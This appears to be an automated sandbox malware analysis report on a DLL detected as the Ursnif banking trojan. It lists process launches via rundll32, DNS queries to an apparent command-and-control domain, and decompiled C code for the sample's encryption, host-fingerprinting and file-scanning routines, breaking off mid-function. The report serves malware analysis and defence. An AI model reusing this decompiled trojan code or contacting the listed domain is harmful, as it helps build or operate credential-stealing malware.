gdiplus.dll	GdipGetLineBlend, GdipSetClipHrgn, GdipIsMatrixInvertible, GdipAddPathArc, GdipAddPathCurveI, GdipDrawCurve3, GdipSetPenCustomEndCap, GdipGetCellDescent, GdipGetHatchStyle, GdipFillPolygon2I, GdipDrawRectangleI, GdipGetCompositingMode, GdipGetImageType, GdipGetTextureImage, GdipDeletePath, GdipSetStringFormatLineAlign, GdipAddPathClosedCurve2I, GdipCreateImageAttributes

Exports

Name	Ordinal	Address
Start	1	0x1000100c

Network Behavior

Network Port Distribution

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 7, 2021 15:56:17.487533092 CEST	53777	53	192.168.2.3	8.8.8.8
Oct 7, 2021 15:56:17.510956049 CEST	53	53777	8.8.8.8	192.168.2.3
Oct 7, 2021 15:56:17.519701958 CEST	57106	53	192.168.2.3	8.8.8.8
Oct 7, 2021 15:56:17.542115927 CEST	53	57106	8.8.8.8	192.168.2.3
Oct 7, 2021 15:56:17.570930004 CEST	60352	53	192.168.2.3	8.8.8.8
Oct 7, 2021 15:56:17.589647055 CEST	53	60352	8.8.8.8	192.168.2.3

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Oct 7, 2021 15:56:17.487533092 CEST	192.168.2.3	8.8.8.8	0xe998	Standard query (0)	app5.folion.xyz	A (IP address)	IN (0x0001)
Oct 7, 2021 15:56:17.519701958 CEST	192.168.2.3	8.8.8.8	0xa495	Standard query (0)	app5.folion.xyz	A (IP address)	IN (0x0001)
Oct 7, 2021 15:56:17.570930004 CEST	192.168.2.3	8.8.8.8	0x4ca5	Standard query (0)	app5.folion.xyz	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
Oct 7, 2021 15:53:32.710131884 CEST	8.8.8.8	192.168.2.3	0x4da5	No error (0)	windowsupdate.s.llnwi.net		178.79.242.128	A (IP address)	IN (0x0001)
Oct 7, 2021 15:56:17.510956049 CEST	8.8.8.8	192.168.2.3	0xe998	Name error (3)	app5.folion.xyz	none	none	A (IP address)	IN (0x0001)
Oct 7, 2021 15:56:17.542115927 CEST	8.8.8.8	192.168.2.3	0xa495	Name error (3)	app5.folion.xyz	none	none	A (IP address)	IN (0x0001)
Oct 7, 2021 15:56:17.589647055 CEST	8.8.8.8	192.168.2.3	0x4ca5	Server failure (2)	app5.folion.xyz	none	none	A (IP address)	IN (0x0001)

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: loaddll32.exe PID: 5268 Parent PID: 5800

General

Start time:	15:52:44
Start date:	07/10/2021
Path:	C:\Windows\System32\loaddll32.exe
Wow64 process (32bit):	true
Commandline:	loaddll32.exe 'C:\Users\user\Desktop\0f.dll'
Imagebase:	0x800000
File size:	893440 bytes
MD5 hash:	72FCD8FB0ADC38ED9050569AD673650E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000001.00000003.739535676.00000000040A8000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000001.00000003.739521647.00000000040A8000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000001.00000003.739458564.00000000040A8000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000001.00000003.739502896.00000000040A8000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000001.00000003.739363916.00000000040A8000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000001.00000002.813265596.00000000040A8000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000001.00000003.739321134.00000000040A8000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000001.00000002.813125689.00000000038F9000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000001.00000003.739404580.00000000040A8000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000001.00000002.810063319.0000000000F60000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000001.00000003.739481698.00000000040A8000.00000004.00000040.sdmp, Author: Joe Security
Reputation:	moderate

Chronological Activities

Analysis Process: cmd.exe PID: 5160 Parent PID: 5268

General

Start time:	15:52:45
Start date:	07/10/2021
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\0f.dll',#1
Imagebase:	0xd80000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: rundll32.exe PID: 2316 Parent PID: 5268

General

Start time:	15:52:45
Start date:	07/10/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe C:\Users\user\Desktop\0f.dll,Start
Imagebase:	0x1380000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000004.00000003.706311406.0000000005BB9000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000004.00000002.706735766.00000000011F0000.00000004.00000001.sdmp, Author: Joe Security
Reputation:	high

Chronological Activities

Analysis Process: rundll32.exe PID: 4760 Parent PID: 5160

General

Start time:	15:52:45
Start date:	07/10/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe 'C:\Users\user\Desktop\0f.dll',#1
Imagebase:	0x1380000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000005.00000002.809626071.0000000000A30000.00000004.00000001.sdmp, Author: Joe Security
Reputation:	high

Chronological Activities

Analysis Process: iexplore.exe PID: 2988 Parent PID: 744

General

Start time:	15:56:15
Start date:	07/10/2021
Path:	C:\Program Files\internet explorer\iexplore.exe
Wow64 process (32bit):	false
Commandline:	'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
Imagebase:	0x7ff62f1c0000
File size:	823560 bytes
MD5 hash:	6465CB92B25A7BC1DF8E01D8AC5E7596
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: iexplore.exe PID: 2964 Parent PID: 2988

General

Start time:	15:56:15
Start date:	07/10/2021
Path:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
Wow64 process (32bit):	true
Commandline:	'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:2988 CREDAT:17410 /prefetch:2
Imagebase:	0x11a0000
File size:	822536 bytes
MD5 hash:	071277CC2E3DF41EEEA8013E2AB58D5A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: loaddll32.exe PID: 5268 Parent PID: 5800 loaddll32.exeCOMMON

Executed Functions

Function 00F94E9C, Relevance: 42.2, APIs: 23, Strings: 1, Instructions: 222
memoryfiletimeCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E00F94E9C(signed char* __eax, intOrPtr* _a4) {
				signed int _v12;
				void* _v16;
				CHAR* _v20;
				struct _FILETIME _v28;
				void* _v32;
				void* _v36;
				char* _v40;
				signed int _v44;
				long _v344;
				struct _WIN32_FIND_DATAA _v368;
				signed int _t72;
				void* _t74;
				signed int _t76;
				void* _t78;
				intOrPtr _t81;
				CHAR* _t83;
				void* _t85;
				signed char _t89;
				signed char _t91;
				intOrPtr _t93;
				void* _t96;
				long _t99;
				int _t101;
				signed int _t109;
				char* _t111;
				void* _t113;
				int _t119;
				char _t128;
				void* _t134;
				signed int _t136;
				char* _t139;
				signed int _t140;
				char* _t141;
				char* _t146;
				signed char* _t148;
				int _t151;
				void* _t152;
				void* _t153;
				void* _t154;
				void* _t165;

				_v12 = _v12 & 0x00000000;
				_t148 = __eax;
				_t72 =  *0xf9a2cc; // 0x63699bc3
				_t74 = RtlAllocateHeap( *0xf9a290, 0, _t72 ^ 0x63699ac7);
				_v20 = _t74;
				if(_t74 == 0) {
					L36:
					return _v12;
				}
				_t76 =  *0xf9a2cc; // 0x63699bc3
				_t78 = RtlAllocateHeap( *0xf9a290, 0, _t76 ^ 0x63699bce);
				_t146 = 0;
				_v36 = _t78;
				if(_t78 == 0) {
					L35:
					HeapFree( *0xf9a290, _t146, _v20);
					goto L36;
				}
				_t136 =  *0xf9a2cc; // 0x63699bc3
				memset(_t78, 0, _t136 ^ 0x63699bce);
				_t81 =  *0xf9a2d0; // 0x310d5a8
				_t154 = _t153 + 0xc;
				_t5 = _t81 + 0xf9b825; // 0x73797325
				_t83 = E00F91000(_t5);
				_v20 = _t83;
				if(_t83 == 0) {
					L34:
					HeapFree( *0xf9a290, _t146, _v36);
					goto L35;
				}
				_t134 = 0xffffffffffffffff;
				_v28.dwLowDateTime = 0x63699bce;
				_v28.dwHighDateTime = 0x63699bce;
				_t85 = CreateFileA(_t83, 0x80000000, 1, 0, 3, 0x80, 0); // executed
				_v32 = _t85;
				if(_t85 != 0x63699bce) {
					GetFileTime(_t85,  &_v28, 0, 0);
					_v28.dwLowDateTime = _v28.dwLowDateTime + 0x2a69c000;
					asm("adc dword [ebp-0x14], 0xc9");
					CloseHandle(_v32);
				}
				 *(StrRChrA(_v20, _t146, 0x5c)) = 0;
				_t89 = 0x3c6ef35f +  *_t148 * 0x19660d;
				_t91 = 0x3c6ef35f + _t89 * 0x19660d;
				 *_t148 = _t91;
				_v32 = _t91 & 0x000000ff;
				_t93 =  *0xf9a2d0; // 0x310d5a8
				_t16 = _t93 + 0xf9b846; // 0x642e2a5c
				_v40 = _t146;
				_v44 = _t89 & 0x000000ff;
				__imp__(_v20, _t16);
				_t96 = FindFirstFileA(_v20,  &_v368); // executed
				_v16 = _t96;
				if(_t96 == _t134) {
					_t146 = 0;
					goto L34;
				}
				_t99 = CompareFileTime( &(_v368.ftLastWriteTime),  &_v28);
				while(_t99 > 0) {
					_t101 = FindNextFileA(_v16,  &_v368); // executed
					if(_t101 == 0) {
						FindClose(_v16);
						_v16 = FindFirstFileA(_v20,  &_v368);
						_v28.dwHighDateTime = _v344;
						_v28.dwLowDateTime = _v368.ftLastWriteTime.dwLowDateTime;
					}
					_t99 = CompareFileTime( &(_v368.ftLastWriteTime),  &_v28);
				}
				_v12 = _v12 & 0x00000000;
				while(1) {
					_t109 = _v44;
					if(_v12 <= _t109) {
						goto L15;
					}
					_t140 = _v12;
					if(_t140 > _v32) {
						_t141 = _v36;
						 *_a4 = _t141;
						while(1) {
							_t128 =  *_t141;
							if(_t128 == 0) {
								break;
							}
							if(_t128 < 0x30) {
								 *_t141 = _t128 + 0x20;
							}
							_t141 = _t141 + 1;
						}
						_v12 = 1;
						FindClose(_v16); // executed
						_t146 = 0;
						goto L35;
					}
					_t165 = _t140 - _t109;
					L15:
					if(_t165 == 0 || _v12 == _v32) {
						_t111 = StrChrA( &(_v368.cFileName), 0x2e);
						_t139 = _v40;
						_t151 = _t111 -  &(_v368.cFileName);
						_t113 = 0;
						if(_t139 != 0) {
							_t48 = _t151 - 4; // -4
							_t113 = _t48;
							if(_t113 > _t151) {
								_t113 = 0;
							}
						}
						if(_t151 > 4) {
							_t151 = 4;
						}
						memcpy(_v36 + _t139, _t152 + _t113 - 0x140, _t151);
						_t154 = _t154 + 0xc;
						_v40 =  &(_v40[_t151]);
					}
					do {
						_t119 = FindNextFileA(_v16,  &_v368); // executed
						if(_t119 == 0) {
							FindClose(_v16);
							_v16 = FindFirstFileA(_v20,  &_v368);
						}
					} while (CompareFileTime( &(_v368.ftLastWriteTime),  &_v28) > 0);
					_v12 = _v12 + 1;
				}
			}

0x00f94ea5
0x00f94eab
0x00f94ead
0x00f94ec7
0x00f94ecb
0x00f94ece
0x00f95143
0x00f9514a
0x00f9514a
0x00f94ed4
0x00f94ee9
0x00f94eeb
0x00f94eef
0x00f94ef2
0x00f95133
0x00f9513d
0x00000000
0x00f9513d
0x00f94ef8
0x00f94f03
0x00f94f08
0x00f94f0d
0x00f94f10
0x00f94f17
0x00f94f1e
0x00f94f21
0x00f95123
0x00f9512d
0x00000000
0x00f9512d
0x00f94f37
0x00f94f3b
0x00f94f3e
0x00f94f41
0x00f94f49
0x00f94f4c
0x00f94f55
0x00f94f5b
0x00f94f65
0x00f94f6c
0x00f94f6c
0x00f94f7e
0x00f94f89
0x00f94f97
0x00f94f9c
0x00f94fa1
0x00f94fa4
0x00f94fa9
0x00f94fb3
0x00f94fb6
0x00f94fb9
0x00f94fcf
0x00f94fd3
0x00f94fd6
0x00f95121
0x00000000
0x00f95121
0x00f94fed
0x00f9503e
0x00f95001
0x00f95009
0x00f9500e
0x00f9501c
0x00f95025
0x00f9502e
0x00f9502e
0x00f9503c
0x00f9503c
0x00f95042
0x00f95046
0x00f95046
0x00f9504c
0x00000000
0x00000000
0x00f9504e
0x00f95054
0x00f950fb
0x00f950fe
0x00f9510b
0x00f9510b
0x00f9510f
0x00000000
0x00000000
0x00f95104
0x00f95108
0x00f95108
0x00f9510a
0x00f9510a
0x00f95114
0x00f9511b
0x00f9511d
0x00000000
0x00f9511d
0x00f9505a
0x00f9505c
0x00f9505c
0x00f9506f
0x00f95075
0x00f95080
0x00f95082
0x00f95086
0x00f95088
0x00f95088
0x00f9508d
0x00f9508f
0x00f9508f
0x00f9508d
0x00f95094
0x00f95098
0x00f95098
0x00f950a8
0x00f950ad
0x00f950b0
0x00f950b0
0x00f950b3
0x00f950bd
0x00f950c5
0x00f950ca
0x00f950d8
0x00f950d8
0x00f950ec
0x00f950f0
0x00f950f0

APIs

RtlAllocateHeap.NTDLL(00000000,63699BC3,00F9A380), ref: 00F94EC7
RtlAllocateHeap.NTDLL(00000000,63699BC3), ref: 00F94EE9
memset.NTDLL ref: 00F94F03

Part of subcall function 00F91000: ExpandEnvironmentStringsA.KERNEL32(00000000,00000000,00000000,00000000,?,63699BCE,00F94F1C,73797325), ref: 00F91011
Part of subcall function 00F91000: ExpandEnvironmentStringsA.KERNEL32(?,00000000,00000000,00000000), ref: 00F9102B

CreateFileA.KERNELBASE(00000000,80000000,00000001,00000000,00000003,00000080,00000000,73797325), ref: 00F94F41
GetFileTime.KERNEL32(00000000,?,00000000,00000000), ref: 00F94F55
CloseHandle.KERNEL32(?), ref: 00F94F6C
StrRChrA.SHLWAPI(?,00000000,0000005C), ref: 00F94F78
lstrcat.KERNEL32(?,642E2A5C), ref: 00F94FB9
FindFirstFileA.KERNELBASE(?,?), ref: 00F94FCF
CompareFileTime.KERNEL32(?,?), ref: 00F94FED
FindNextFileA.KERNELBASE(00F93EAC,?), ref: 00F95001
FindClose.KERNEL32(00F93EAC), ref: 00F9500E
FindFirstFileA.KERNEL32(?,?), ref: 00F9501A
CompareFileTime.KERNEL32(?,?), ref: 00F9503C
StrChrA.SHLWAPI(?,0000002E), ref: 00F9506F
memcpy.NTDLL(00F92779,?,00000000), ref: 00F950A8
FindNextFileA.KERNELBASE(00F93EAC,?), ref: 00F950BD
FindClose.KERNEL32(00F93EAC), ref: 00F950CA
FindFirstFileA.KERNEL32(?,?), ref: 00F950D6
CompareFileTime.KERNEL32(?,?), ref: 00F950E6
FindClose.KERNELBASE(00F93EAC), ref: 00F9511B
HeapFree.KERNEL32(00000000,00F92779,73797325), ref: 00F9512D
HeapFree.KERNEL32(00000000,?), ref: 00F9513D

Strings

Ut, xrefs: 00F9512D, 00F9513D

Memory Dump Source

Source File: 00000001.00000002.810340952.0000000000F91000.00000020.00020000.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000001.00000002.810321795.0000000000F90000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.810445470.0000000000F99000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.810494847.0000000000F9A000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.810512763.0000000000F9C000.00000002.00020000.sdmp Download File

Similarity

API ID: File$Find$CloseHeapTime$CompareFirst$AllocateEnvironmentExpandFreeNextStrings$CreateHandlelstrcatmemcpymemset
String ID: Ut
API String ID: 455834338-8415677
Opcode ID: deb7addfab7012c25d1265a25f22d8aa1fa5ae8e6cc410a0e46477153dde83f7
Instruction ID: 2db1ac2afbd0ba3e8b263d95e4bc82e35c6d26ff66230942775301379e344846
Opcode Fuzzy Hash: deb7addfab7012c25d1265a25f22d8aa1fa5ae8e6cc410a0e46477153dde83f7
Instruction Fuzzy Hash: 7A814B71D0010EAFEF11DFA5DC84AEEBBB9FB48710F10006AE515E6260E7719A44EFA0

Uniqueness

Uniqueness Score: -1.00%

Function 00F935A1, Relevance: 19.7, APIs: 13, Instructions: 163
encryptionCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E00F935A1(int __eax, intOrPtr _a4, int _a8, void* _a12, intOrPtr* _a16, intOrPtr* _a20) {
				int _v8;
				long* _v12;
				int _v16;
				BYTE* _v20;
				long* _v24;
				void* _v39;
				char _v40;
				void _v56;
				int _v60;
				intOrPtr _v64;
				void _v67;
				char _v68;
				void* _t61;
				int _t68;
				signed int _t76;
				int _t79;
				int _t81;
				int _t85;
				long _t86;
				int _t90;
				signed int _t94;
				int _t101;
				BYTE* _t102;
				int _t103;
				void* _t104;
				void* _t105;
				void* _t106;

				_t103 = __eax;
				_t94 = 6;
				_v68 = 0;
				memset( &_v67, 0, _t94 << 2);
				_t105 = _t104 + 0xc;
				asm("stosw");
				asm("stosb");
				_v40 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosw");
				asm("stosb");
				_t61 =  *0xf9a0b8( &_v24, 0, 0, 0x18, 0xf0000000); // executed
				if(_t61 == 0) {
					_a8 = GetLastError();
				} else {
					_t101 = 0x10;
					memcpy( &_v56, _a8, _t101);
					_t106 = _t105 + 0xc;
					_v60 = _t101;
					_v67 = 2;
					_v64 = 0x660e;
					_v68 = 8;
					_t68 = CryptImportKey(_v24,  &_v68, 0x1c, 0, 0,  &_v12); // executed
					if(_t68 == 0) {
						_a8 = GetLastError();
					} else {
						_push(0);
						_push( &_v40);
						_push(1);
						_push(_v12);
						if( *0xf9a0dc() == 0) {
							_a8 = GetLastError();
						} else {
							_t18 = _t103 + 0xf; // 0x10
							_t76 = _t18 & 0xfffffff0;
							if(_a4 != 0 && _t76 == _t103) {
								_t76 = _t76 + _t101;
							}
							_t102 = E00F95C4E(_t76);
							_v20 = _t102;
							if(_t102 == 0) {
								_a8 = 8;
							} else {
								_v16 = 0;
								_a8 = 0;
								while(1) {
									_t79 = 0x10;
									_v8 = _t79;
									if(_t103 <= _t79) {
										_v8 = _t103;
									}
									memcpy(_t102, _a12, _v8);
									_t81 = _v8;
									_a12 = _a12 + _t81;
									_t103 = _t103 - _t81;
									_t106 = _t106 + 0xc;
									if(_a4 == 0) {
										_t85 = CryptDecrypt(_v12, 0, 0 | _t103 == 0x00000000, 0, _t102,  &_v8);
									} else {
										_t85 =  *0xf9a0a8(_v12, 0, 0 | _t103 == 0x00000000, 0, _t102,  &_v8, 0x20);
									}
									if(_t85 == 0) {
										break;
									}
									_t90 = _v8;
									_v16 = _v16 + _t90;
									_t102 =  &(_t102[_t90]);
									if(_t103 != 0) {
										continue;
									} else {
										L17:
										 *_a16 = _v20;
										 *_a20 = _v16;
									}
									goto L21;
								}
								_t86 = GetLastError();
								_a8 = _t86;
								if(_t86 != 0) {
									E00F92A03(_v20);
								} else {
									goto L17;
								}
							}
						}
						L21:
						CryptDestroyKey(_v12);
					}
					CryptReleaseContext(_v24, 0);
				}
				return _a8;
			}

0x00f935aa
0x00f935b0
0x00f935b3
0x00f935b9
0x00f935b9
0x00f935bb
0x00f935bd
0x00f935c0
0x00f935c6
0x00f935c7
0x00f935c8
0x00f935ce
0x00f935d3
0x00f935d9
0x00f935e1
0x00f9373e
0x00f935e7
0x00f935e9
0x00f935f2
0x00f935f7
0x00f93609
0x00f9360c
0x00f93610
0x00f93617
0x00f9361b
0x00f93623
0x00f93729
0x00f93629
0x00f93629
0x00f9362d
0x00f9362e
0x00f93630
0x00f9363b
0x00f93715
0x00f93641
0x00f93641
0x00f93644
0x00f9364a
0x00f93650
0x00f93650
0x00f93658
0x00f9365c
0x00f9365f
0x00f93706
0x00f93665
0x00f9366b
0x00f9366e
0x00f93671
0x00f93673
0x00f93676
0x00f93679
0x00f9367b
0x00f9367b
0x00f93685
0x00f9368a
0x00f9368d
0x00f93690
0x00f93692
0x00f9369b
0x00f936c5
0x00f9369d
0x00f936ae
0x00f936ae
0x00f936cd
0x00000000
0x00000000
0x00f936cf
0x00f936d2
0x00f936d5
0x00f936d9
0x00000000
0x00f936db
0x00f936ea
0x00f936f0
0x00f936f8
0x00f936f8
0x00000000
0x00f936d9
0x00f936dd
0x00f936e5
0x00f936e8
0x00f936ff
0x00000000
0x00000000
0x00000000
0x00f936e8
0x00f9365f
0x00f93718
0x00f9371b
0x00f9371b
0x00f93730
0x00f93730
0x00f93748

APIs

CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000018,F0000000,00000000,00000000,00000000,?,?,?,00F91B16,00000001,00F96301,00000000), ref: 00F935D9
memcpy.NTDLL(00F91B16,00F96301,00000010,?,?,?,00F91B16,00000001,00F96301,00000000,?,00F95B47,00000000,00F96301,?,00000000), ref: 00F935F2
CryptImportKey.ADVAPI32(?,?,0000001C,00000000,00000000,00000000), ref: 00F9361B
CryptSetKeyParam.ADVAPI32(00000000,00000001,?,00000000), ref: 00F93633
memcpy.NTDLL(00000000,00000000,040A9630,00000010), ref: 00F93685
CryptEncrypt.ADVAPI32(00000000,00000000,00000000,00000000,00000000,040A9630,00000020,?,?,00000010), ref: 00F936AE
CryptDecrypt.ADVAPI32(00000000,00000000,00000000,00000000,00000000,040A9630,?,?,00000010), ref: 00F936C5
GetLastError.KERNEL32(?,?,00000010), ref: 00F936DD
GetLastError.KERNEL32 ref: 00F9370F
CryptDestroyKey.ADVAPI32(00000000), ref: 00F9371B
GetLastError.KERNEL32 ref: 00F93723
CryptReleaseContext.ADVAPI32(?,00000000), ref: 00F93730
GetLastError.KERNEL32(?,?,?,00F91B16,00000001,00F96301,00000000,?,00F95B47,00000000,00F96301,?,00000000,00F96301,00000000,040A9630), ref: 00F93738

Memory Dump Source

Source File: 00000001.00000002.810340952.0000000000F91000.00000020.00020000.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000001.00000002.810321795.0000000000F90000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.810445470.0000000000F99000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.810494847.0000000000F9A000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.810512763.0000000000F9C000.00000002.00020000.sdmp Download File

Similarity

API ID: Crypt$ErrorLast$Contextmemcpy$AcquireDecryptDestroyEncryptImportParamRelease
String ID:
API String ID: 1967744295-0
Opcode ID: a9f5b2fdcde42d8d0672ea9c3d567f74b7e0a3d729a3fccb45fcade2b28b91d9
Instruction ID: 98b10fc986d28b1664ad936108c454a946c7928a3462e6b8024bc8798a59fee4
Opcode Fuzzy Hash: a9f5b2fdcde42d8d0672ea9c3d567f74b7e0a3d729a3fccb45fcade2b28b91d9
Instruction Fuzzy Hash: D95161B290420CFFEF10DFA9DC85AAE7BB9EB44350F10442AF511E6250D7749E14EB61

Uniqueness

Uniqueness Score: -1.00%

Function 00F93946, Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 102
memoryCOMMON

Download Yara Rule

C-Code - Quality: 96%

			E00F93946(char __eax, signed int* __esi) {
				long _v8;
				char _v12;
				signed int _v16;
				signed int _v20;
				signed int _v28;
				long _t34;
				signed int _t39;
				long _t50;
				char _t59;
				intOrPtr _t61;
				void* _t62;
				void* _t63;
				signed int* _t64;
				char _t65;
				intOrPtr* _t67;
				void* _t68;
				signed int* _t69;

				_t69 = __esi;
				_t65 = __eax;
				_v8 = 0;
				_v12 = __eax;
				if(__eax == 0) {
					_t59 =  *0xf9a2c8; // 0xbd092303
					_v12 = _t59;
				}
				_t64 = _t69;
				E00F9354E( &_v12, _t64);
				if(_t65 != 0) {
					 *_t69 =  *_t69 ^  *0xf9a2cc ^ 0x4c0ca0ae;
				} else {
					GetUserNameW(0,  &_v8); // executed
					_t50 = _v8;
					if(_t50 != 0) {
						_t62 = RtlAllocateHeap( *0xf9a290, 0, _t50 + _t50);
						if(_t62 != 0) {
							if(GetUserNameW(_t62,  &_v8) != 0) {
								_t63 = _t62;
								 *_t69 =  *_t69 ^ E00F93F12(_v8 + _v8, _t63);
							}
							HeapFree( *0xf9a290, 0, _t62);
						}
					}
				}
				_t61 = __imp__;
				_v8 = _v8 & 0x00000000;
				GetComputerNameW(0,  &_v8);
				_t34 = _v8;
				if(_t34 != 0) {
					_t68 = RtlAllocateHeap( *0xf9a290, 0, _t34 + _t34);
					if(_t68 != 0) {
						if(GetComputerNameW(_t68,  &_v8) != 0) {
							_t63 = _t68;
							_t69[3] = _t69[3] ^ E00F93F12(_v8 + _v8, _t63);
						}
						HeapFree( *0xf9a290, 0, _t68);
					}
				}
				asm("cpuid");
				_t67 =  &_v28;
				 *_t67 = 1;
				 *((intOrPtr*)(_t67 + 4)) = _t61;
				 *(_t67 + 8) = _t63;
				 *(_t67 + 0xc) = _t64;
				_t39 = _v16 ^ _v20 ^ _v28;
				_t69[1] = _t69[1] ^ _t39;
				return _t39;
			}

0x00f93946
0x00f9394e
0x00f93954
0x00f93957
0x00f9395a
0x00f9395c
0x00f93961
0x00f93961
0x00f93967
0x00f93969
0x00f93976
0x00f939d7
0x00f93978
0x00f9397d
0x00f93983
0x00f93988
0x00f93996
0x00f9399a
0x00f939a9
0x00f939b0
0x00f939b7
0x00f939b7
0x00f939c2
0x00f939c2
0x00f9399a
0x00f93988
0x00f939d9
0x00f939df
0x00f939e9
0x00f939eb
0x00f939f0
0x00f939ff
0x00f93a03
0x00f93a0e
0x00f93a15
0x00f93a1c
0x00f93a1c
0x00f93a28
0x00f93a28
0x00f93a03
0x00f93a31
0x00f93a33
0x00f93a36
0x00f93a38
0x00f93a3b
0x00f93a3e
0x00f93a48
0x00f93a4c
0x00f93a50

APIs

GetUserNameW.ADVAPI32(00000000,00F92F3F), ref: 00F9397D
RtlAllocateHeap.NTDLL(00000000,00F92F3F), ref: 00F93994
GetUserNameW.ADVAPI32(00000000,00F92F3F), ref: 00F939A1
HeapFree.KERNEL32(00000000,00000000,?,?,?,?,?,00F92F3F,?,?,?,?,?,00F944F9,?,00000001), ref: 00F939C2
GetComputerNameW.KERNEL32(00000000,00000000), ref: 00F939E9
RtlAllocateHeap.NTDLL(00000000,00000000), ref: 00F939FD
GetComputerNameW.KERNEL32(00000000,00000000), ref: 00F93A0A
HeapFree.KERNEL32(00000000,00000000), ref: 00F93A28

Strings

Ut, xrefs: 00F939C2, 00F93A28

Memory Dump Source

Source File: 00000001.00000002.810340952.0000000000F91000.00000020.00020000.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000001.00000002.810321795.0000000000F90000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.810445470.0000000000F99000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.810494847.0000000000F9A000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.810512763.0000000000F9C000.00000002.00020000.sdmp Download File

Similarity

API ID: HeapName$AllocateComputerFreeUser
String ID: Ut
API String ID: 3239747167-8415677
Opcode ID: eba7e72aec0e3981555ae6aba5cd897d05a41c4d82a4cbf0a4c491426444818a
Instruction ID: dcfce84184ab63b2ad19adebb6af03ea6397be9315b4491846374651348a44f4
Opcode Fuzzy Hash: eba7e72aec0e3981555ae6aba5cd897d05a41c4d82a4cbf0a4c491426444818a
Instruction Fuzzy Hash: C7310B71A10209EFEB11DFA9DC81B6EB7FAFB48710F21406AE545D3220D771EE04AB51

Uniqueness

Uniqueness Score: -1.00%

Function 100017A7, Relevance: 15.1, APIs: 10, Instructions: 103
threadsleepsynchronizationCOMMON

Download Yara Rule

C-Code - Quality: 80%

			E100017A7(intOrPtr _a4) {
				char _v28;
				struct _SYSTEMTIME _v44;
				char _v48;
				long _v52;
				long _v56;
				void* __edi;
				long _t21;
				int _t23;
				long _t26;
				long _t27;
				long _t31;
				void* _t37;
				intOrPtr _t39;
				intOrPtr _t44;
				signed int _t45;
				void* _t50;
				signed int _t54;
				void* _t56;
				intOrPtr* _t57;

				_t21 = E1000146C();
				_v52 = _t21;
				if(_t21 != 0) {
					L18:
					return _t21;
				} else {
					goto L1;
				}
				do {
					L1:
					GetSystemTime( &_v44);
					_t23 = SwitchToThread();
					asm("cdq");
					_t45 = 9;
